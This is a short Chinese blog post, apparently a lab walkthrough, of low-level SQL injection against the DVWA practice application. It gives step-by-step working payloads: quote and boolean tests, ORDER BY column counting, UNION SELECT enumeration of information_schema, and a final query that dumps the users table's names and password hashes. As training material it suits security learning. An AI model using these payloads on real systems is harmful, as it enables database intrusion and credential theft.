DVWA之low級別SQL Injection

原創

2018-09-03 07:44

輸入1，返回正常，輸入1‘ and ’1‘=’2，返回空，輸入1‘ or 1234=1234 #

說明存在字符型注入。

然後猜解字段數，輸入1‘ order by 1 #，返回正常，輸入1’ order by 2 #，返回正常

輸入1‘ order by 3 #，報錯，說明只有兩個字段，即First name、Surname。

確定顯示的字段順序

輸入1′ union select 1,2 #，查詢成功：

說明執行的SQL語句爲select First name,Surname from 表 where ID=’id’…

獲取當前數據庫，執行1' union select 1,database() #，返回正常

說明當前數據庫爲dvwa

獲取數據庫中的表。1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查詢成功

說明兩個表名分別爲guestbook，users。

獲取字段名，輸入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #，查詢成功

最後1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查詢成功

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

相關文章

甲骨文成立以來最大手筆：300億美元收購 Cerner 進軍醫療保健領域

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-21 10:54:01

專訪融雲 VP 岑裕：複雜場景下，如何解放開發者？

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-01 18:43:50

Twitter CEO 離職搞比特幣？CTO 成繼任者

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-12-01 10:03:50

InfoQ搬新家啦，來留下你的祝福吧！

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

极客邦科技

2021-11-18 17:58:58

TDengine在浙商銀行微服務監控中的實踐

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-11-12 16:03:55

微服務鏈路追蹤組件Skywalking實戰

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"1. skywalk

2021-10-20 20:03:57

2021雲棲大會 | 傳統行業如何上鍊？旺鏈科技與你面對面暢聊！

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-10-19 14:13:52

國內首家100G雲服務器產品家族，正式規模應用！

{"type":"doc","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null,"origin":null},"content":[{"typ

2021-10-19 12:13:55

Kafka 生產環境部署指南

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":2},"content":[{"type":"text","text":"1 Kafka 基本

2021-10-18 14:23:54

技術人在職場如何擺放的心態

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

2021-10-18 13:24:05

我用 10000 張圖片合成我們美好的瞬間

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":1}},{"type":"blockquote","content":[{"type":"pa

2021-10-16 20:33:52

獨一無二的「MySQL調優金字塔」相信也許你擁有了它，你就很可能擁有了全世界。

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"開發俏皮話","at

2021-10-14 11:03:55

團隊管理之如何成爲核心員工

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":1},"content":[{"type":"text","text":"核心員工的三個階段"

小诚信驿站

2021-10-13 14:03:53

談 C++17 裏的 State 模式之二

{"type":"doc","content":[{"type":"blockquote","content":[{"type":"paragraph","attrs":{"indent":0,"number":0,"align":null

2021-10-12 21:03:51

怎麼給程序員做職業規劃？

{"type":"doc","content":[{"type":"heading","attrs":{"align":null,"level":3},"content":[{"type":"text","text":"程序員的中年危機",

2021-10-12 13:03:52

24小時熱門文章

python gdal 安裝使用（Windows， python 3.6.8）

最新文章

最新評論文章